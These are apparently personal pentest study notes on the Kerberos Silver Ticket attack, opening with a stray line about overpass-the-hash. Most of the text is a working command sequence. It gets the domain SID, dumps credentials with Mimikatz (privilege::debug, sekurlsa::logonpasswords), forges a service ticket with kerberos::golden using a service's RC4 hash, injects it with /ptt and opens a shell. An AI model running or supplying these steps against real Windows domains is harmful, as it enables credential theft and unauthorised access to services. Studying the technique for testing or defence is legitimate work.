- the overpass the hash technique to acquire a Kerberos TGT, allowing us to authenticate using Kerberos. We can only use the TGT on the machine it was created for, but the TGS potentially offers more flexibility
- whoami /user
to get SID like S-1-5-21-1602875587-2787523311-2599479668-1103
The SID defining the domain is the entire string except the RID at the end ( -1103 )
- Extract hash of the service
- Mimikatz.exe
- privilege::debug
- sekurlsa::logonpasswords
- kerberos::purge to delete existing ticket
- kerberos::list to verify
- kerberos::golden /user:<user> /domain:<domain> /sid:<sid> /target:<fully qualified host name of the service> /service:<service_name>/rc4:<password hash of that service> /ptt
- misc::cmd to launch cmd to verify the success
Reference:
Silver Ticket Attack